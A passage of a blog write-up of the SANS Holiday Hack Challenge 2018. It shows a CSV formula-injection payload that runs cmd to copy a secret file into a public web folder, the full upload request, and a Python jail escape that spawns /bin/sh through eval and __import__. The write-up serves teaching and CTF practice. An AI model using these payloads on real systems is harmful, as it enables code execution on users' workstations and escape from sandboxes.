Content-Disposition: form-data; name=&amp;quot;phone&amp;quot;

0000000000
-----------------------------1284099169763381272238033
Content-Disposition: form-data; name=&amp;quot;email&amp;quot;

foo@bar.com
-----------------------------1284099169763381272238033
Content-Disposition: form-data; name=&amp;quot;csv&amp;quot;; filename=&amp;quot;resume.csv&amp;quot;
Content-Type: text/csv

Super pentester

-----------------------------1284099169763381272238033--
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.1&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 03 Jan 2019 16:18:04 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=utf-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Express&lt;/span&gt;
&lt;span class="na"&gt;ETag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;W/&amp;quot;172-gwRZ+l3Bn2+yGvHpphldazlOPqI&amp;quot;&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;370&lt;/span&gt;

Thank you for taking the time to upload your information to our elf resources shared workshop station! Our elf resources will review your CSV work history within the next few minutes to see if you qualify to join our elite team of InfoSec Elves. If you are accepted, you will be added to our secret list of potential new elf hires located in C:\candidate_evaluation.docx
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="career_upload.png" class="align-center" src="/images/sans-christmas-challenge-2018/career_upload.png" /&gt;
&lt;p&gt;I first thought that we'd have to perform an upload vulnerability, where we
could upload a webshell and gain remote code execution on the server. I tried
looking for an upload directory, for example in &lt;code&gt;/uploads/&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/uploads/&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;careers.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Upgrade-Insecure-Requests&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.1&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 03 Jan 2019 16:23:08 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Express&lt;/span&gt;
&lt;span class="na"&gt;Cache-Control&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;public, max-age=0&lt;/span&gt;
&lt;span class="na"&gt;Last-Modified&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Fri, 07 Dec 2018 01:34:04 GMT&lt;/span&gt;
&lt;span class="na"&gt;ETag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;W/&amp;quot;f48-167864ce0e2&amp;quot;&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;3912&lt;/span&gt;

&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
[snip]
  &lt;span class="c"&gt;&amp;lt;!--physical server path---&amp;gt;&lt;/span&gt;
   &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Publicly accessible file served from: &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;br&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
     C:\careerportal\resources\public\    not found......&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
     &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;br&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
   &lt;span class="c"&gt;&amp;lt;!---logical web path--&amp;gt;&lt;/span&gt;
     &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;strong&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Try: &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;br&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; https://careers.kringlecastle.com/public/&amp;#39;file name you are looking for&amp;#39;&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;strong&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;


&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="career_404.png" class="align-center" src="/images/sans-christmas-challenge-2018/career_404.png" /&gt;
&lt;p&gt;Hmm, what a helpful 404 error message. It gives us the full path to the public
web folder, and the URL. This means, that if we can get the
&lt;code&gt;C:\candidate_evaluation.docx&lt;/code&gt; in this directory, we'll be able to
download it. But how can we do so with only what we have in the application
form?&lt;/p&gt;
&lt;p&gt;The work history file that we upload is a CSV file. And apparently, this server
is a Windows server, given the file paths, and all. This means that the CSV
file will probably be opened by an elf using Excel. In that case, we can use
a &lt;a class="reference external" href="https://www.contextis.com/en/blog/comma-separated-vulnerabilities"&gt;CSV injection&lt;/a&gt; to
execute code on the elf's workstation. This is a vulnerability we sometimes
find during pentest assessments. However, it's pretty low risk, because it's
kind of clunky to exploit: the user has to download the CSV, try to evaluate
the cell with our payload, and click &amp;quot;Yes&amp;quot; on a warning prompt. It's still
worth a try, though:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat copy_file_to_www.csv
&lt;span class="go"&gt;=cmd|&amp;#39; /c copy C:\candidate_evaluation.docx C:\careerportal\resources\public\omg_secret_file.docx&amp;#39;!A0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This payload will copy the wanted file in the public web folder, under the
name &lt;code&gt;omg_secret_file.docx&lt;/code&gt;. Let's upload it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/api/upload/application&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;careers.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://careers.kringlecastle.com/&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------12548806719497856202051334912&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;803&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

-----------------------------12548806719497856202051334912
Content-Disposition: form-data; name=&amp;quot;firstname&amp;quot;

Foo
-----------------------------12548806719497856202051334912
Content-Disposition: form-data; name=&amp;quot;lastname&amp;quot;

Bar
-----------------------------12548806719497856202051334912
Content-Disposition: form-data; name=&amp;quot;phone&amp;quot;

0000000000
-----------------------------12548806719497856202051334912
Content-Disposition: form-data; name=&amp;quot;email&amp;quot;

foo@bar.com
-----------------------------12548806719497856202051334912
Content-Disposition: form-data; name=&amp;quot;csv&amp;quot;; filename=&amp;quot;copy_file_to_www.csv&amp;quot;
Content-Type: text/csv

=cmd|&amp;#39; /c copy C:\candidate_evaluation.docx C:\careerportal\resources\public\omg_secret_file.docx&amp;#39;!A0

-----------------------------12548806719497856202051334912--
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We wait a couple seconds, and then bingo! We can download the file from the
URL &lt;a class="reference external" href="https://careers.kringlecastle.com/public/omg_secret_file.docx"&gt;https://careers.kringlecastle.com/public/omg_secret_file.docx&lt;/a&gt;. You can
download this file &lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/candidate_evaluation.docx"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now, we were asked to find which terrorist organization is supported by the
job applicant whose name begins with &amp;quot;K&amp;quot;. Let's open up the document:&lt;/p&gt;
&lt;img alt="career_candiate_docx.png" class="align-center" src="/images/sans-christmas-challenge-2018/career_candiate_docx.png" /&gt;
&lt;p&gt;Here's what we can learn on this applicant:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;span class="underline"&gt;Candidate Name: Krampus&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Comments (Please summarize your perceptions of the candidate’s strengths,
and any concerns that should be considered:&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Krampus’s career summary included experience hardening decade old attack
vectors, and lacked updated skills to meet the challenges of attacks
against our beloved Holidays.&lt;/p&gt;
&lt;p&gt;Furthermore, there is intelligence from the North Pole &lt;strong&gt;this elf is linked
to cyber terrorist organization Fancy Beaver&lt;/strong&gt; who openly provides
technical support to the villains that attacked our Holidays last year.&lt;/p&gt;
&lt;p&gt;We owe it to Santa to find, recruit, and put forward trusted candidates
with the right skills and ethical character to meet the challenges that
threaten our joyous season.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, apparently the candidate name is &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Krampus"&gt;Krampus&lt;/a&gt;, and he's linked to the terrorist
organization &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Fancy_Bear"&gt;Fancy Beaver&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="network-traffic-forensics"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id33"&gt;Network Traffic Forensics&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We find Hans in Santa's secret room:&lt;/p&gt;
&lt;img alt="hans.png" class="align-center" src="/images/sans-christmas-challenge-2018/hans.png" /&gt;
&lt;p&gt;&lt;em&gt;Hans says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You’ve found me and blocked my access to Santa’s treasure.&lt;/p&gt;
&lt;p&gt;You’ve done well in foiling me. But, I’ve still got a chance.&lt;/p&gt;
&lt;p&gt;When you steal six hundred dollars, you can disappear. When you steal all
of Santa’s treasure, they will find you… unless….&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(muffled yelling)&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="hans_snow.png" class="align-center" src="/images/sans-christmas-challenge-2018/hans_snow.png" /&gt;
&lt;p&gt;&lt;em&gt;The narrator says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;And then suddenly, Hans slips and falls into a snowbank. His nefarious
plan thwarted, he's now just cold and wet.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;But Santa still has more questions for you to solve!&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="santa.png" class="align-center" src="/images/sans-christmas-challenge-2018/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;HO HO HO!!!&lt;/p&gt;
&lt;p&gt;You did a great job, but keep going!&lt;/p&gt;
&lt;p&gt;Solve all remaining objectives in your badge.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="section" id="sugarplum-mary-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id34"&gt;SugarPlum Mary's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're trapped inside a Python interpreter, and we must escape and run a
program:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;               :lllllllllllllllllllllllllllllllllllllllll,
               &amp;#39;lllllllllllllllllllllllllllllllllllllllll:
                clllllllllllllllllllllllllllllllllllllllll.
                &amp;#39;lllllllllllllllllllllllllllllllllllllllll:
                 ;lllllllllllllllllllllllllllllllllllllllll,
                  :lllllllllllllllllllllllllllllllllllllllll.
                   :lllllllllllllllllllllllllllllllllllllllll.
                    ;lllllllllllllllllllllllllllllllllllllllll&amp;#39;
                     &amp;#39;lllllllllllllllllllllllllllllllllllllllll;
                      .cllllllllllllllllllllllllllllllllllllllllc.
                      .:llllllllllllllllllllllllllllllllllllllllllc,.
                   .:llllllllllllllllllllllllllllllllllllllllllllllll;.
                .,cllllllllllllllllllllllllllllllllllllllllllllllllllll,
              .;llllllllllllllllllllllllllllllllllllllllllllllllllllllllc.
             ;lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllc.
           &amp;#39;llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllc
          :lllllll:..,..&amp;#39;cllllllllllllllllllllllc&amp;#39;.,&amp;#39;.&amp;#39;clllllllllllllllllll;
        .clllllll&amp;#39;  :XK.  :llllllllllllllllllll;  ,XX.  ;lllllllllllllllllll.
       .cllllllll.  oXX&amp;#39;  ,llllllllllllllllllll.  cXX;  .lllllllllllllllllll&amp;#39;
       clllllllll;  .xl  .cllllllllllllllllllllc.  do  .clllllllllllllllllll,
      :llllllllllll;&amp;#39;..&amp;#39;:llllllllllllllllllllllll:&amp;#39;..&amp;#39;:lllllllllllllllllllll&amp;#39;
     .llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.
     ;lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllc
     clllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.
     cllllllllllllllllllllllllll..;lc..:llllllllllllllllllllllllllllllllll;
     :lllllllllllllllllllllllll:  .l,  .lllllllllllllllllllllllllllllllll:
     ,lllllllllllllllllllllllllc  .l;  ,llllllllllllllllllllllllllllllll:
     .llllllllllllllllllllllllllc;lll::llllllllllllllllllllllllllllllll,
      &amp;#39;llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllc.
       ,llllllllllllllllllllllllllllllllllllllllllllllllllllllllllll,
        &amp;#39;llllllllllllllllcccccccc;&amp;#39;,.,clllllllllllllllllllllllllll,
         .cllllllc:::::;;,,,,&amp;#39;...&amp;#39;:c:;...&amp;#39;&amp;#39;,,;;;::::::lllllllllc,
           &amp;#39;cllllc::;::::cccccccccllc,,,,,,,&amp;#39;&amp;#39;,:::::::lllllll;.
             .:llllllllllkMMMMMMMMMdlclllllllllollllllllll;.
               .&amp;#39;:lllllllXMMMMMMMMMoloWMMMMMMMMXllllll:,.
                   .,:llccccccccccllllXMMMMMMMMWl:;&amp;#39;.
                       .,,,,,,,,,,clll:::::::::;
                      &amp;#39;lllllllllc.    &amp;#39;,,,,,,,,.
                     lMMMMMMMMMW,    .ddddddddd.
                    kMMMMMMMMMX.     kMMMMMMMMK
                   &amp;#39;:::::::::,      .NWWWWWWWW:
                  &amp;#39;,,,,,,,,,.       .,,,,,,,,&amp;#39;
                .oooooooooo.        &amp;#39;,,,,,,,,.
               .NMMMMMMMMW;        cOOOOOOOOx
               0MMMMMMMMMc         NMMMMMMMMk
               ;;;;;;;;;&amp;#39;         .KKKKKKKKK:
              .,,,,,,,,,           ,,,,,,,,,.
              .ddddddddo           &amp;#39;,,,,,,,,.
               XMMMMMMMN           cKKKKKKKKK.
    .;:::;;,,,,,:ldddddd.           0MMMMMMMMX.       ....
      .,:ccccccccccccccc            &amp;#39;cccccccccc:::ccccc;.
         .:ccccccccccccc            .ccccccccccccccc:&amp;#39;.
           .;;;;;;;;;;;;            .ccccccccccccc;.
                                    ..............


I&amp;#39;m another elf in trouble,
Caught within this Python bubble.
Here I clench my merry elf fist -
Words get filtered by a black list!
Can&amp;#39;t remember how I got stuck,
Try it - maybe you&amp;#39;ll have more luck?
For this challenge, you are more fit.
Beat this challenge - Mark and Bag it!
-SugarPlum Mary
To complete this challenge, escape Python
and run ./i_escaped
&amp;gt;&amp;gt;&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I first tried to &lt;code&gt;import&lt;/code&gt; the &lt;code&gt;os&lt;/code&gt; module, but it was forbidden:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;os&lt;/span&gt;
&lt;span class="go"&gt;Use of the command import is prohibited for this question.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Other functions and objects like that are unavailable, such as
&lt;code&gt;__builtins__&lt;/code&gt;, or &lt;code&gt;exec&lt;/code&gt;. However, &lt;code&gt;eval&lt;/code&gt; is available:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;eval&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;built-in function eval&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Since &lt;code&gt;eval&lt;/code&gt; takes a string as an argument, and evaluates it as Python
code, I thought I could bypass the restriction on &lt;code&gt;import&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;import os&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;Use of the command import is prohibited for this question.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, does not work. What if I try some string modification?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;impor&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;t os&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  File &lt;span class="nb"&gt;&amp;quot;&amp;lt;string&amp;gt;&amp;quot;&lt;/span&gt;, line &lt;span class="m"&gt;1&lt;/span&gt;
    &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;os&lt;/span&gt;
         &lt;span class="o"&gt;^&lt;/span&gt;
&lt;span class="gr"&gt;SyntaxError&lt;/span&gt;: &lt;span class="n"&gt;invalid syntax&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get a syntax error. However, it does not seem like the jail tries to block
our &lt;code&gt;import&lt;/code&gt;. So, what are some other ways you can &lt;code&gt;import&lt;/code&gt; in
Python, without calling &lt;code&gt;import&lt;/code&gt;? By searching for write-ups of Python
jail escapes, I found this &lt;a class="reference external" href="https://codezen.fr/2012/10/25/hack-lu-ctf-python-jail-writeup/"&gt;website&lt;/a&gt;
where the jail blocks &lt;code&gt;__import__&lt;/code&gt;. Let's see if our jail does also:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;__impo&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;rt__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;built-in function __import__&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright! It's not blocked. We can use &lt;code&gt;__import__&lt;/code&gt; to import the
&lt;code&gt;os&lt;/code&gt; module, and the call &lt;code&gt;system&lt;/code&gt;, in order to gain a shell
access:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&amp;gt;&amp;gt; eval&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;__imp&amp;#39;&lt;/span&gt;+&lt;span class="s1"&gt;&amp;#39;ort__(&amp;quot;os&amp;quot;).system(&amp;quot;/bin/sh&amp;quot;)&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ls
&lt;span class="go"&gt;i_escaped&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ./i_escaped
&lt;span class="go"&gt;Loading, please wait......&lt;/span&gt;

&lt;span class="go"&gt;  ____        _   _&lt;/span&gt;
&lt;span class="go"&gt; |  _ \ _   _| |_| |__   ___  _ __&lt;/span&gt;
&lt;span class="go"&gt; | |_) | | | | __| &amp;#39;_ \ / _ \| &amp;#39;_ \&lt;/span&gt;
&lt;span class="go"&gt; |  __/| |_| | |_| | | | (_) | | | |&lt;/span&gt;
&lt;span class="go"&gt; |_|___ \__, |\__|_| |_|\___/|_| |_| _ _&lt;/span&gt;
&lt;span class="go"&gt; | ____||___/___ __ _ _ __   ___  __| | |&lt;/span&gt;
&lt;span class="go"&gt; |  _| / __|/ __/ _` | &amp;#39;_ \ / _ \/ _` | |&lt;/span&gt;
&lt;span class="go"&gt; | |___\__ \ (_| (_| | |_) |  __/ (_| |_|&lt;/span&gt;
&lt;span class="go"&gt; |_____|___/\___\__,_| .__/ \___|\__,_(_)&lt;/span&gt;
&lt;span class="go"&gt;                     |_|&lt;/span&gt;
&lt;span class="go"&gt;That&amp;#39;s some fancy Python hacking -&lt;/span&gt;
&lt;span class="go"&gt;You have sent that lizard packing!&lt;/span&gt;
&lt;span class="go"&gt;-SugarPlum Mary&lt;/span&gt;

&lt;span class="go"&gt;You escaped! Congratulations!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For those of you that are curious, here's the code of the jail, which includes
a solution:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#! /usr/bin/env python3&lt;/span&gt;
&lt;span class="c1"&gt;# -*- coding: utf-8 -*-&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;readline&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;code&lt;/span&gt;

&lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nb"&gt;input&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;raw_input&lt;/span&gt;
&lt;span class="k"&gt;except&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;pass&lt;/span&gt;

&lt;span class="n"&gt;banner&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&amp;#39; [snip] &amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;readfilter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
